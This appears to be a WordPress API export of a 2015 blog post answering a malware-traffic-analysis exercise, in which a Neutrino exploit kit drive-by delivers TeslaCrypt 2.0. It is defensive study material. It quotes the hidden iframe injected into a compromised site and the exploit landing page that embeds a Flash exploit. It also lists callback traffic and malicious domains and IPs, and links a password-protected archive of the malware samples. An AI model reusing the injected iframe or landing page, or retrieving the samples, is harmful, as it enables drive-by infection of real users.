{"id":173,"date":"2015-09-15T22:12:57","date_gmt":"2015-09-15T21:12:57","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=173"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-08-31-whats-the-ek-whats-the-payload","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=173","title":{"rendered":"Malware Exercise 2015-08-31 &#8211; What&#8217;s the EK? What&#8217;s the payload?"},"content":{"rendered":"<h3>TL;DR<\/h3>\n<p>Basically this is one of Brad&#8217;s typical spot the malware within the PCAP from a drive-by infection. Nothing exciting like the previous one, but still good practice. Unfortunately I did get some of this one wrong (stupid me for not updating Snort rules in Security Onion). Also, one thing to note about this one that threw me for a loop. Trying to export objects in Wireshark did not work for me. I ended up using CapTipper&#8217;s &#8220;dump&#8221; command to export all the objects from the PCAP into a directory.<\/p>\n<h3>My Results<\/h3>\n<ul>\n<li>IP address of the Windows computer that was infected.<br \/>\n<blockquote><p>\n  192.168.137.239\n<\/p><\/blockquote>\n<\/li>\n<li>MAC address of the Windows computer that was infected.<br \/>\n<blockquote><p>\n  00:02:a5:1c:d4:92\n<\/p><\/blockquote>\n<\/li>\n<li>Host name of the Windows computer that was infected.<br \/>\n<blockquote><p>\n  Name: GOOGENHEIM-PC\n<\/p><\/blockquote>\n<\/li>\n<li>Name of the exploit kit.<br \/>\n<blockquote><p>\n  Sweet Orange EK <span style=\"color: #ff0000\">&lt;- This was incorrect as Sweet Orange has not been around for almost a year. This was a\u00a0Neutrino exploit kit.<\/span>\n<\/p><\/blockquote>\n<\/li>\n<li>Identification of the payload (for example: Bedep, CryptoWall 3.0, Dyre, Rovnix, Vawtrak, etc).<br \/>\n<blockquote><p>\n  Alphacypt <span style=\"color: #ff0000\">&lt;- This was incorrect as this was really TelsaCrypt 2.0 from what Brad has suggested.<\/span>\n<\/p><\/blockquote>\n<\/li>\n<li>Identification of the compromised website that kicked off this infection chain.<br \/>\n<blockquote><p>\n  http:\/\/vitaminsthatrock.com\/\n<\/p><\/blockquote>\n<\/li>\n<li>Any Indicators of compromise (IOCs) from the traffic to include IP addresses and domain names.<br \/>\n<blockquote><p>\n  vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390 \/ 46.108.156.181<br \/>\n  ipinfo.io \/ 54.164.11.220<br \/>\n  asecproteccion.com \/ 72.55.148.19<br \/>\n  lk2gaflsgh.jgy658snfyfnvh.com \/ 104.238.174.179<br \/>\n  tpfnmvg.ioxbpjgtqvwqfzmwhn.ga:35407 \/ 46.108.156.181\n<\/p><\/blockquote>\n<\/li>\n<\/ul>\n<h3>Notes about the investigation<\/h3>\n<p>When we start looking at the PCAP, we can see an odd URL structure as seen below, which seems to be the start of the infection:<\/p>\n<blockquote><p>\n  GET \/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft HTTP\/1.1<br \/>\n  Accept: text\/html, application\/xhtml+xml, <em>\/<\/em><br \/>\n  Referer: http:\/\/vitaminsthatrock.com\/<br \/>\n  Accept-Language: en-US<br \/>\n  User-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko<br \/>\n  Accept-Encoding: gzip, deflate<br \/>\n  Host: vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390<br \/>\n  DNT: 1<br \/>\n  Connection: Keep-Alive<\/p>\n<p>  HTTP\/1.1 200 OK<br \/>\n  Server: nginx\/1.4.6 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 17:58:25 GMT<br \/>\n  Content-Type: text\/html<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Connection: keep-alive<br \/>\n  Content-Encoding: gzip<\/p>\n<p>  249<br \/>\n  &#8230;&#8230;&#8230;.mSQo.0.~&#8230;&#8230;C IiC&#8230;.I.Vm..=&#8230;Sc.l&#8230;..I.n&#8230;&#8230;;..[}.|&#8230;~.C&#8230;&#8230;&#8230;\/..{..<br \/>\n  o..l7&#8230;..h[Sm..FSE..W.p.\\uMH.u~&#8230;&#8230;;)&#046;&#8221;&#8230;&#8230;..d5&#8230;..<code>,.e....ZZ..i...%.fy.z.....0.........&amp;gt;{..x......B.f.GU;..y.....hzJ.dE...P2.g.)Q.}'....ZYk...Wa4[.K.Ji52.W.8.......Iw.9T.{....c....J.<\/code>..&#046;&#8230;t!&lt;<em>&#8230;..y.&#8221;&#8230;(&#8230;9.8.b.I&#8230;..%.0&#046;&#8230;(jVq.ie(.K.jS<br \/>\n  &#8230;LI.&amp;%.0&#8230;. &#8230;d@_&#8230;&#8230;E+j..J..ep9.]&#8230;..m<br \/>\n  .una,..<br \/>\n  ..%.B5@M&#8230;&#8230;&#8230;.?b.i&#8230;.R<code>r..\"......(S..R.....T)...w.#c..S.(S...o<br \/>\n  ...RM...h......H....7.R).....h.l.'7..R..Su}..iU)......;)..e1.7TI...<\/code>.0.5;&#8217;.@.`W7.#..<\/em>..U.&gt; 9. ..&#046;&#8230;&#8230;&#8217;.t&#8230;.j..V&#8230;&#8230;.\n<\/p><\/blockquote>\n<p>Capptipper shows that there is a hidden iframe in http:\/\/vitaminsthatrock.com\/ as seen below:<\/p>\n<blockquote><p>\n  CT&gt; iframes 86<br \/>\n  Searching for iframes in object 86 (86.html)&#8230;<br \/>\n  1 iframe(s) Found!<\/p>\n<p>  [I] 1 : http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<\/p>\n<p>  &lt;iframe src=&#8221;http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft&#8221; width=&#8221;250&#8243; height=&#8221;250&#8243;&gt;&lt;\/iframe&gt;\n<\/p><\/blockquote>\n<p>The link above directs the end-user\u00a0to a page that hosts the Flash exploit and evidentially the TelsaCrypt 2.0 binary as seen below from the PCAP (the <a href=\"http:\/\/en.wikipedia.org\/wiki\/List_of_file_signatures\" target=\"_blank\">magic number<\/a>\u00a0of &#8220;CWS&#8221; found in the beginning of the packet data for the Flash file):<\/p>\n<blockquote><p>\n  CT&gt; info 135<br \/>\n  Info of conversation 135:<br \/>\n  SERVER IP : 46.108.156.181:13390<br \/>\n  TIME : Mon, 08\/31\/15 17:58:19<br \/>\n  HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390<br \/>\n  URI : \/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<br \/>\n  REFERER : http:\/\/vitaminsthatrock.com\/<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : text\/html<br \/>\n  FILE NAME : host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<br \/>\n  MAGIC : HyperText Markup Language (HTML)<br \/>\n  LENGTH : 943 B<\/p>\n<p>  CT&gt; head 135<br \/>\n  Displaying header of object 135 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Server: nginx\/1.4.6 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 17:58:25 GMT<br \/>\n  Content-Type: text\/html<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Connection: keep-alive<br \/>\n  Content-Encoding: gzip<\/p>\n<p>  CT&gt; body 135 1000<br \/>\n  Displaying body of object 135 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft) [943 bytes]:<\/p>\n<p>  &lt;!DOCTYPE HTML PUBLIC &#8220;-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN&#8221; &#8220;http:\/\/www.w3.org\/TR\/html4\/loose.dtd&#8221;&gt;<br \/>\n  &lt;html&gt;<br \/>\n  &lt;body&gt;<br \/>\n  &lt;script&gt;<br \/>\n  var ucnojasxgkcgrtya = 794340;<br \/>\n  var cvyldjvqc = 927343;<br \/>\n  var seigojzlpjnwbgvbb = 41400;<br \/>\n  var wiparkq = 749213;<br \/>\n  var nbywimfhyvrlsssnt = 783426;<br \/>\n  var yllnlc = 938791;<br \/>\n  &lt;\/script&gt;<br \/>\n  &lt;object height=&#8221;799&#8243; classid=&#8221;clsid:d27cdb6e-ae6d-11cf-96b8-444553540000&#8243; width=&#8221;167&#8243; codebase=&#8221;http:\/\/fpdownload.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=10,1,52,0&#8243; id=&#8221;qvuhndngs&#8221;&gt;<br \/>\n  &lt;param value=&#8221;\/defense\/eGxyaGM&#8221; name=&#8221;movie&#8221;\/&gt;<br \/>\n  &lt;param value=&#8221;#ffffff&#8221; name=&#8221;bgcolor&#8221;\/&gt;<br \/>\n  &lt;param value=&#8221;always&#8221; name=&#8221;allowScriptAccess&#8221;\/&gt;<br \/>\n  &lt;embed name=&#8221;qvuhndngs&#8221; width=&#8221;167&#8243; pluginspage=&#8221;http:\/\/www.macromedia.com\/go\/getflashplayer&#8221; allowScriptAccess=&#8221;sameDomain&#8221; height=&#8221;799&#8243; type=&#8221;application\/x-shockwave-flash&#8221; quality=&#8221;high&#8221; src=&#8221;\/defense\/eGxyaGM&#8221; &gt; play=&#8221;true&#8221; loop=&#8221;false&#8221; align=&#8221;middle&#8221;\/&gt;<br \/>\n  &lt;\/object&gt;<\/p>\n<p>  &lt;\/body&gt;<br \/>\n  &lt;\/html&gt;<\/p>\n<h6>#<\/h6>\n<p>  CT&gt; info 136<br \/>\n  Info of conversation 136:<br \/>\n  SERVER IP : 46.108.156.181:13390<br \/>\n  TIME : Mon, 08\/31\/15 17:58:21<br \/>\n  HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390<br \/>\n  URI : \/defense\/eGxyaGM<br \/>\n  REFERER : http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : application\/x-shockwave-flash<br \/>\n  FILE NAME : eGxyaGM<br \/>\n  MAGIC : Compressed Flash File [ZLIB] (SWF)<br \/>\n  LENGTH : 75155 B<\/p>\n<p>  CT&gt; head 136<br \/>\n  Displaying header of object 136 (eGxyaGM):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Server: nginx\/1.4.6 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 17:58:27 GMT<br \/>\n  Content-Type: application\/x-shockwave-flash<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Connection: keep-alive<\/p>\n<p>  CT&gt; body 136 1000<br \/>\n  Displaying body of object 136 (eGxyaGM) [1000 bytes]:<\/p>\n<p>  CWS9*x???XM?5??m????????!?kpw??;?!?{???.?%?!?s????????S\u04fd?juw??k &lt;etc&#8230;&gt;<\/p>\n<h6>#<\/h6>\n<p>  CT&gt; info 137<br \/>\n  Info of conversation 137:<br \/>\n  SERVER IP : 46.108.156.181:13390<br \/>\n  TIME : Mon, 08\/31\/15 17:58:23<br \/>\n  HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390<br \/>\n  URI : \/2014\/11\/27\/from\/assemble\/become-open-corp-opportunity-sign-punish-curious-family.html<br \/>\n  REFERER : http:\/\/vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390\/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : text\/html<br \/>\n  FILE NAME : become-open-corp-opportunity-sign-punish-curious-family.html<br \/>\n  MAGIC : GZIP archive file (GZ)<br \/>\n  LENGTH : 20 B<\/p>\n<p>  CT&gt; head 137<br \/>\n  Displaying header of object 137 (become-open-corp-opportunity-sign-punish-curious-family.html):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Server: nginx\/1.4.6 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 17:58:29 GMT<br \/>\n  Content-Type: text\/html<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Connection: keep-alive<br \/>\n  Content-Encoding: gzip<\/p>\n<p>  CT&gt; body 137 10000<br \/>\n  Displaying body of object 137 (become-open-corp-opportunity-sign-punish-curious-family.html) [20 bytes]:<\/p>\n<p>  ?\u00a0<span style=\"color: #ff0000\">&lt;- Odd thing here is that Captipper shows just a question mark for the body of the response. When you look in the actual PCAP you get the following:<\/span>\n<\/p><\/blockquote>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Wireshark.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-179 aligncenter\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/Wireshark.png\" alt=\"Same request just from Wireshark\" width=\"644\" height=\"288\" \/><\/a><\/p>\n<blockquote>\n<h6>#<\/h6>\n<p>  CT&gt; info 138<br \/>\n  Info of conversation 138:<br \/>\n  SERVER IP : 46.108.156.181:13390<br \/>\n  TIME : Mon, 08\/31\/15 17:58:24<br \/>\n  HOST : vclphjybj.ioxbpjgtqvwqfzmwhn.ga:13390<br \/>\n  URI : \/1987\/11\/04\/burn\/each-madness-lucky-american-charm-handle-none.html<br \/>\n  REFERER :<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : application\/octet-stream<br \/>\n  FILE NAME : each-madness-lucky-american-charm-handle-none.html<br \/>\n  MAGIC : Inconclusive. Probably binary (BINARY)<br \/>\n  LENGTH : 314473 B<\/p>\n<p>  CT&gt; head 138<br \/>\n  Displaying header of object 138 (each-madness-lucky-american-charm-handle-none.html):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Server: nginx\/1.4.6 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 17:58:30 GMT<br \/>\n  Content-Type: application\/octet-stream<br \/>\n  Content-Length: 314473<br \/>\n  Connection: keep-alive<br \/>\n  Last-Modified: Mon, 31 Aug 2015 16:42:44 GMT<br \/>\n  ETag: &#8220;55e48404-4cc69&#8221;<br \/>\n  Accept-Ranges: bytes<\/p>\n<p>  CT&gt; body 138 10000<br \/>\n  Displaying body of object 138 (each-madness-lucky-american-charm-handle-none.html) [10000 bytes]:<\/p>\n<p>  ??M??<br \/>\n  0????pp<br \/>\n  ?w?:?? ???u?&#8221;pv?? &lt;etc&#8230;&gt;<\/p>\n<h6>#<\/h6>\n<\/blockquote>\n<p>In this case I could open the\u00a0Flash file (eGxyaGM) via 7Zip which reveals the actual SWF file.\u00a0I used two different tools to try to extract anything from the SWF file. The tools I used were SWFTools and JPEXS Free Flash Decompiler. Usually I start off with SWFTools to see what binary files are attached to the SWF file. For example, to get one of the binary files out of the Flash\u00a0file using SWFTools, you use the following syntax:<\/p>\n<blockquote><p>\n  mine:~ guido$ swfextract \/Users\/guido\/GitHub\/Malware-Excercises\/2015-08-31\\ Traffic\\ Analysis\\ Exercise\/Artifacts\/136-eGxyaGM\\~.swf<br \/>\n  Objects in file \/Users\/guido\/GitHub\/Malware-Excercises\/2015-08-31 Traffic Analysis Exercise\/Artifacts\/136-eGxyaGM~.swf:<br \/>\n  [-b] 4 Binarys: ID(s) 1-4<br \/>\n  [-f] 1 Frame: ID(s) 0<br \/>\n  mine:~ guido$ swfextract -b 1 \/Users\/guido\/GitHub\/Malware-Excercises\/2015-08-31\\ Traffic\\ Analysis\\ Exercise\/Artifacts\/136-eGxyaGM\\~.swf -o binary1.bin\n<\/p><\/blockquote>\n<p>where \u00a0the\u00a0<em>-b<\/em> is the switch for the binary files found, the\u00a0<em>1<\/em> is for the first of <em>4<\/em> binary files found, and <em>-o &lt;out file name&gt;<\/em> is the name of the file from the extraction. Unfortunately I was not able to figure out what these binary files were or how they were part of the malware delivery mechanism to the end user. I was also not able to see anything related to these files on VirusTotal (no positive hits at least).<\/p>\n<p>I then switched gears and used JPEXS to get a different perspective and to see what the ActionScript was doing. Unfortunately I was not able to put the binary and the ActionScript\u00a0together either. I asked Brad about this and if he had any ideas about how to RE the binary files or how to better understand the ActionScript that the Flash file uses, but he was not sure\u00a0either.<\/p>\n<p>So at this point I know that there is a Flash exploit being used, and based on conversation 138 from Captipper there is a binary file as well (see below). So most likely the Flash file exploits the system because of an out-of-date Flash version (Captipper actually did not show the Flash version in the GET request where as Wireshark did in the TCP stream &#8211; <em>x-flash-version: 18,0,0,203<\/em>), and then uses that to pull down the TelsaCrypt 2.0 binary <em>somehow.\u00a0<\/em><\/p>\n<p>From there we can see that the system makes a call out to a site to get the external IP address of the system as seen below:<\/p>\n<blockquote><p>\n  GET \/ip HTTP\/1.1<br \/>\n  User-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)<br \/>\n  Host: ipinfo.io<\/p>\n<p>  HTTP\/1.1 200 OK<br \/>\n  Access-Control-Allow-Origin: *<br \/>\n  Content-Type: text\/html; charset=utf-8<br \/>\n  Date: Mon, 31 Aug 2015 17:58:32 GMT<br \/>\n  Server: nginx\/1.6.2<br \/>\n  Content-Length: 14<br \/>\n  Connection: keep-alive<\/p>\n<p>  66.187.73.162\n<\/p><\/blockquote>\n<p>We can also see that there are some post-infection call-backs as well as seen below:<\/p>\n<blockquote><p>\n  CT&gt; info 140<br \/>\n  Info of conversation 140:<br \/>\n  SERVER IP : 72.55.148.19:80<br \/>\n  TIME : Mon, 08\/31\/15 17:58:33<br \/>\n  HOST : asecproteccion.com<br \/>\n  URI : \/wp-content\/plugins\/useful-banner-manager\/misc.php?D0B1745184D4B19325F8CA239D78E804BD793E372420CA2549A1E52E593467D8A&#8230;.cont&#8230;<br \/>\n  REFERER :<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : text\/html<br \/>\n  FILE NAME : misc.php<br \/>\n  MAGIC : Inconclusive. Probably text (TEXT)<br \/>\n  LENGTH : 25 B<\/p>\n<p>  CT&gt; head 140<br \/>\n  Displaying header of object 140 (misc.php):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Date: Mon, 31 Aug 2015 17:58:32 GMT<br \/>\n  Server: Apache\/2.2.31 (Unix) mod_ssl\/2.2.31 OpenSSL\/1.0.1e-fips mod_bwlimited\/1.4<br \/>\n  X-Powered-By: PHP\/5.3.29<br \/>\n  Keep-Alive: timeout=5, max=100<br \/>\n  Connection: Keep-Alive<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Content-Type: text\/html<\/p>\n<p>  C&gt; T&gt; body 140 1000<br \/>\n  Displaying body of object 140 (misc.php) [25 bytes]:<\/p>\n<p>  &#8212;!!!INSERTED!!!&#8212;&gt;<\/p>\n<p>  1<\/p>\n<h6>#<\/h6>\n<p>  CT&gt; info 141<br \/>\n  Info of conversation 141:<br \/>\n  SERVER IP : 72.55.148.19:80<br \/>\n  TIME : Mon, 08\/31\/15 17:59:15<br \/>\n  HOST : asecproteccion.com<br \/>\n  URI : \/wp-content\/plugins\/useful-banner-manager\/misc.php?D3ECA3EC23AA62A397F6CA71219BA2F0A53C602EE2A2E4E3&#8230;cont&#8230;<br \/>\n  REFERER :<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : text\/html<br \/>\n  FILE NAME : misc.php<br \/>\n  MAGIC : Inconclusive. Probably text (TEXT)<br \/>\n  LENGTH : 25 B<\/p>\n<p>  CT&gt; head 141<br \/>\n  Displaying header of object 141 (misc.php):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Date: Mon, 31 Aug 2015 17:59:14 GMT<br \/>\n  Server: Apache\/2.2.31 (Unix) mod_ssl\/2.2.31 OpenSSL\/1.0.1e-fips mod_bwlimited\/1.4<br \/>\n  X-Powered-By: PHP\/5.3.29<br \/>\n  Keep-Alive: timeout=5, max=100<br \/>\n  Connection: Keep-Alive<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Content-Type: text\/html<\/p>\n<p>  CT&gt; body 141 1000<br \/>\n  Displaying body of object 141 (misc.php) [25 bytes]:<\/p>\n<p>  &#8212;!!!INSERTED!!!&#8212;<br \/>\n  1<\/p>\n<h6>#<\/h6>\n<p>  CT&gt; info 142<br \/>\n  Info of conversation 142:<\/p>\n<p>  SERVER IP : 46.108.156.181:35407<br \/>\n  TIME : Mon, 08\/31\/15 17:59:28<br \/>\n  HOST : tpfnmvg.ioxbpjgtqvwqfzmwhn.ga:35407<br \/>\n  URI : \/giant\/1171219\/host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<br \/>\n  REFERER : http:\/\/vitaminsthatrock.com\/<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 404 Not Found<br \/>\n  RESULT TYPE : text\/html<br \/>\n  FILE NAME : host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft<br \/>\n  MAGIC : HyperText Markup Language (HTML)<br \/>\n  LENGTH : 538 B<\/p>\n<p>  CT&gt; head 142<br \/>\n  Displaying header of object 142 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft):<br \/>\n  HTTP\/1.1 404 Not Found<br \/>\n  Server: nginx\/1.4.6 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 17:59:34 GMT<br \/>\n  Content-Type: text\/html<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Connection: keep-alive<br \/>\n  Content-Encoding: gzip<\/p>\n<p>  CT&gt; body 142 1000<br \/>\n  Displaying body of object 142 (host-dare-creature-valley-pour-tunnel-sense-season-thumb-soft) [538 bytes]:<\/p>\n<p>  &lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;&lt;body bgcolor=&#8221;white&#8221;&gt;&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;&lt;hr&gt;&lt;center&gt;nginx&lt;\/center&gt;&lt;\/body&gt;&lt;\/html&gt;&lt;!&#8211; a padding to disable MSIE and Chrome friendly error page &#8211;&gt;&lt;!&#8211; a &gt; padding to disable MSIE and Chrome friendly error page &#8211;&gt;&lt;!&#8211; a padding to disable MSIE and Chrome friendly error page &#8211;&gt;&lt;!&#8211; a padding to disable MSIE and Chrome friendly error page &#8211;&gt;&lt;!&#8211; a padding to disable MSIE and &gt; Chrome friendly error page &#8211;&gt;&lt;!&#8211; a padding to disable MSIE and Chrome friendly error page &#8212;<\/p>\n<h6>#<\/h6>\n<\/blockquote>\n<p>From there we then see that the final page loads for the decrypting service as seen below:<\/p>\n<blockquote><p>\n  CT&gt; info 151<br \/>\n  Info of conversation 151:<br \/>\n  SERVER IP : 104.238.174.179:80<br \/>\n  TIME : Mon, 08\/31\/15 18:00:13<br \/>\n  HOST : lk2gaflsgh.jgy658snfyfnvh.com<br \/>\n  URI : \/672E4DBC873FBD2A<br \/>\n  REFERER :<br \/>\n  METHOD : GET<br \/>\n  RESULT NUM : 200 OK<br \/>\n  RESULT TYPE : text\/html<br \/>\n  FILE NAME : 672E4DBC873FBD2A<br \/>\n  MAGIC : Inconclusive. Probably text (TEXT)<br \/>\n  LENGTH : 3132 B<\/p>\n<p>  CT&gt; head 151<br \/>\n  Displaying header of object 151 (672E4DBC873FBD2A):<br \/>\n  HTTP\/1.1 200 OK<br \/>\n  Server: nginx\/1.6.2 (Ubuntu)<br \/>\n  Date: Mon, 31 Aug 2015 18:00:14 GMT<br \/>\n  Content-Type: text\/html<br \/>\n  Transfer-Encoding: chunked<br \/>\n  Connection: keep-alive<br \/>\n  X-Check-Tor: false<br \/>\n  X-Powered-By: PHP\/5.5.12-2ubuntu4.4<br \/>\n  Content-Encoding: gzip<br \/>\n  Set-Cookie: PHPSESSID=j784i2u51v00ejlajpfmssjua0; path=\/<br \/>\n  Expires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>\n  Pragma: no-cache<\/p>\n<p>  CT&gt; body 151 1000<br \/>\n  Displaying body of object 151 (672E4DBC873FBD2A) [1000 bytes]:<\/p>\n<p>  &lt;!DOCTYPE html&gt;<\/p>\n<p>  &lt;html xmlns=&#8221;http:\/\/www.w3.org\/1999\/xhtml&#8221;&gt;<br \/>\n  &lt;head&gt;<br \/>\n  &lt;title&gt;Decrypt service&lt;\/title&gt;<br \/>\n  &lt;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text\/html; charset=utf-8&#8243;\/&gt;<\/p>\n<h6>#<\/h6>\n<\/blockquote>\n<h3>Hashes and VT Info from this investigation<\/h3>\n<p>136-eGxyaGM<br \/>\nMD5: b02c12f0df9911d16066c0d0f05b28c6<br \/>\nVT Link: http:\/\/www.virustotal.com\/file\/a5ef5b9fdae4f9c6edafd1b2ea6a6a67cdee4cee793841917996e3501b8adacc\/analysis\/1441209136\/<br \/>\nFirst Submission: 2015-08-31 20:21:44 UTC<br \/>\nPositives: 0 \/ 56<\/p>\n<p>136-eGxyaGM~.swf<br \/>\nMD5: b914e101d44ccca6d1e7fcb5dee61216<br \/>\nVT Link: http:\/\/www.virustotal.com\/file\/5e518aaac1991e5efe72c0b3a67dec159bf3f28ff338359a1b605b5b0f1807a6\/analysis\/1441408039\/<br \/>\nFirst Submission: 2015-09-04 23:07:19 UTC<br \/>\nPositives: 1 \/ 56<\/p>\n<p>138-each-madness-lucky-american-charm-handle-none.exe<br \/>\nMD5: 869e7a996f1b65d28f8589af81b85fe6<br \/>\nVT Link: http:\/\/www.virustotal.com\/file\/387d6f4670bfd929e4b91fc715cb03c86ddf926dc9c39d783181467224b6edf9\/analysis\/1441163547\/<br \/>\nFirst submission 2015-08-31 20:49:39 UTC<br \/>\nPositives: 0 \/ 56<\/p>\n<p>The artifacts found within this exercise can be found <a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/09\/2015-08-31-Traffic-Analysis-Artifacts.zip\">here<\/a> with the standard password of\u00a0<em>infected. <\/em>Looking at Brad&#8217;s artifacts, it looks like the exe file that I think that I got is different than his. 8-(<\/p>\n<p>If you have any ideas about how the Flash exploit works or any good resources that I can go and read up on, please leave a comment.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>TL;DR Basically this is one of Brad&#8217;s typical spot the malware within the PCAP from a drive-by infection. Nothing exciting like the previous one, but still good practice. Unfortunately I did get some of this one wrong (stupid me for not updating Snort rules in Security Onion). Also, one thing to note about this one that threw me for a loop. Trying to export objects in Wireshark did not work for me. I ended up using CapTipper&#8217;s &#8220;dump&#8221; command to export all the objects from the PCAP into a directory. My Results IP address of the Windows computer that was&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=173\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-173","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=173"}],"version-history":[{"count":10,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/173\/revisions"}],"predecessor-version":[{"id":185,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/173\/revisions\/185"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}